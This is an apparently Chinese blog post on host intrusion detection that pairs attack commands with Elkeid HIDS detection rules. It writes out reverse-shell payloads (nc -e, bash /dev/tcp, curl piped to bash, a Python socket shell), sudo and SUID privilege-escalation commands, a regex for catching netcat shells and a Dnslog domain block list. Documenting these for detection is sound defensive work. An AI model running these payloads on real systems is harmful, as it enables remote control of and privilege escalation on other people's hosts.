当前位置: 首页 > news >正文

主机安全-进程、命令攻击与检测

目录

  • 概述
  • 反弹shell
    • 原理
    • nc
    • /dev/xxx反弹shell
    • 下载不落地反弹Shell
    • 各种语言反弹shell
  • linux提权
    • sudo
    • suid提权
    • mysql提权
  • Dnslog
  • 参考


概述

本文更新通过在主机(不含容器)上直接执行命令或启动进程来攻击的场景。检测方面以字节跳动的开源HIDS elkeid举例。每种检测仅举一个例子,其余的给出示例payload。

反弹shell

原理

控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端

nc

nc 远程ip 端口 -e /bin/bash

Elkeid规则如下:

(?:\bnc(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.openbsd(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.traditional(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.linux(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnetcat(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*))

在这里插入图片描述

/dev/xxx反弹shell

指的是通过/dev/tcp或/dev/udp的方式建立连接反弹shell,举例:

bash -i >& /dev/tcp/远程ip/端口 0>&1

下载不落地反弹Shell

指的是下载后通过管道等方式执行,不落地,举例:

curl/wget http://xxx.sh | bash

各种语言反弹shell

以Python为例:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("远程ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux提权

sudo

原理:临时赋予root权限运行某个程序

sudo less file_path
!bash

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

suid提权

chmod u+s filename 设置SUID位
chmod u-s filename 去掉SUID设置

收集具有suid的文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

在这里插入图片描述

mysql提权

  • udf提权
  • 写入webshell提权
  • mof提权

Dnslog

Elkeid规则如下:

.awvsscan119.autoverify.cn|.cybertunnel.run|.dnstunnel.run|.s0x.cn|.dns.1433.eu.org|.logplog.eu.org|.ns.dns3.cf|.vuleye.pw|.ceye.io|.exeye.io|.vcap.me|.xip.name|.xip.io|.sslip.io|.nip.io|.burpcollaborator.net|.tu4.org|.2xss.cc|.bxss.me|.godns.vip|.0kee.360.cn|.r87.me|.ngrok.io|.xn--9tr.com|.pipedream.net|.vxtrans.com|.vxtrans.link|.hopto.org|.zapto.org|.sytes.net|.ddns.net

在这里插入图片描述
在这里插入图片描述

参考

linux提权
反弹Shell原理及检测技术研究

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • 哪些事件会导致浏览器窗口宽高变化
  • 使用jsencrypt在web前端对字符串进行Ras加密
  • MySQL 日志深度解析:从查询执行到性能优化
  • 从零开始实现大语言模型(五):缩放点积注意力机制
  • idea启动ssm项目详细教程
  • llama-recipes
  • YOLO v8进行目标检测的遇到的bug小结
  • 澳门建筑插画:成都亚恒丰创教育科技有限公司
  • 【操作系统】进程管理——死锁(个人笔记)
  • IP 地址与 CDN 性能优化
  • java.lang.NullPointerException: null cannot be cast to non-null type kotlin.Int
  • 【系统架构设计】计算机组成与体系结构(三)
  • 【机器学习理论基础】回归模型定义和分类
  • 【CSS in Depth 2 精译】2.6 CSS 自定义属性(即 CSS 变量)+ 2.7 本章小结
  • Spring MVC 全面指南:从入门到精通的详细解析
  • [分享]iOS开发 - 实现UITableView Plain SectionView和table不停留一起滑动
  • 3.7、@ResponseBody 和 @RestController
  • Centos6.8 使用rpm安装mysql5.7
  • ES6语法详解(一)
  • Fastjson的基本使用方法大全
  • HTTP请求重发
  • Java 内存分配及垃圾回收机制初探
  • js继承的实现方法
  • laravel 用artisan创建自己的模板
  • MySQL Access denied for user 'root'@'localhost' 解决方法
  • SAP云平台里Global Account和Sub Account的关系
  • SpriteKit 技巧之添加背景图片
  • SQLServer之索引简介
  • vagrant 添加本地 box 安装 laravel homestead
  • vue--为什么data属性必须是一个函数
  • Webpack入门之遇到的那些坑,系列示例Demo
  • 前端每日实战:70# 视频演示如何用纯 CSS 创作一只徘徊的果冻怪兽
  • 悄悄地说一个bug
  • 用mpvue开发微信小程序
  • Salesforce和SAP Netweaver里数据库表的元数据设计
  • 昨天1024程序员节,我故意写了个死循环~
  • #我与Java虚拟机的故事#连载19:等我技术变强了,我会去看你的 ​
  • (二)Pytorch快速搭建神经网络模型实现气温预测回归(代码+详细注解)
  • (附源码)spring boot建达集团公司平台 毕业设计 141538
  • (附源码)springboot炼糖厂地磅全自动控制系统 毕业设计 341357
  • (六) ES6 新特性 —— 迭代器(iterator)
  • (循环依赖问题)学习spring的第九天
  • (一)模式识别——基于SVM的道路分割实验(附资源)
  • (一)十分简易快速 自己训练样本 opencv级联haar分类器 车牌识别
  • (已解决)vue+element-ui实现个人中心,仿照原神
  • (转)C#调用WebService 基础
  • (转)清华学霸演讲稿:永远不要说你已经尽力了
  • (自适应手机端)行业协会机构网站模板
  • .equal()和==的区别 怎样判断字符串为空问题: Illegal invoke-super to void nio.file.AccessDeniedException
  • .net CHARTING图表控件下载地址
  • .NET Core MongoDB数据仓储和工作单元模式封装
  • .Net Core 笔试1
  • .NET Core 中的路径问题
  • .NET Framework 3.5安装教程
  • .Net Web窗口页属性